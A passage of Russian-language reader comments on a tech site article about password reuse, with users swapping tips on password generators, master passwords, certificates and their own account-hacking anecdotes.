                                                                                                                                  О! Чуть не забыл — пароли ко всем хостингам специально меняю на генерированные по 15 символов, и не запоминаю. Если письмо у заказчика проебалось не нашлось с паролем, то простите — был один экземпляр только у заказчика.
                                                                                                                                  0
                                                                                                                                  Есть готовое решение — passwordmaker
                                                                                                                                  Генерация по мастер-паролю и доменному имени. Есть плагин для FF
                                                                                                                                  Очень удобно, запомнил один «сильный» пароль — получил множество уникальных для каждого сайта паролей
                                                                                                                                  0
                                                                                                                                  интересней бы было, как ты, автор, конкретно добрался да баз данных, а не повторение этого и без того банального открытия, что часто пользователи используют один пароль для всего.
                                                                                                                                    0
                                                                                                                                    А не пора ли плавно переходить от паролей к личным сертификатам и электронным ключам?
                                                                                                                                      0
                                                                                                                                      как мне кажется — запароленный архив с файликом с паролями вполне себе выход.
                                                                                                                                        0
                                                                                                                                        >Может стоит задуматься?
                                                                                                                                        Автор приглашает всех подбирать пароли к e-mail'ам :)
                                                                                                                                          +1
                                                                                                                                          В последнее время спам в контакте ну просто затрахал! Не было такой недели, чтобы кого-то из друзей не взломали. Со злости состряпал мини-статью о безопасности в интернете. Дал несколько советов «для блондинок» как придумать устойчивый пароль… Разослал это дело всем контактам… И случилось чудо! Вот уже несколько месяцев ни одного взломанного друга! Может совпадение? :)
                                                                                                                                          • НЛО прилетело и опубликовало эту надпись здесь
                                                                                                                                            • НЛО прилетело и опубликовало эту надпись здесь
                                                                                                                                                0
                                                                                                                                                каюсь, у меня один пароль на все акки, и он простой. Хакеры обещали не взламывать если буду хорошо вести
                                                                                                                                                  0
                                                                                                                                                  На всякий случай усложнил свой пароль на почту…
                                                                                                                                                    +1
                                                                                                                                                    О! Виндовс 7!

                                                                                                                                                    Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

                                                                                                                                                    Самое читаемое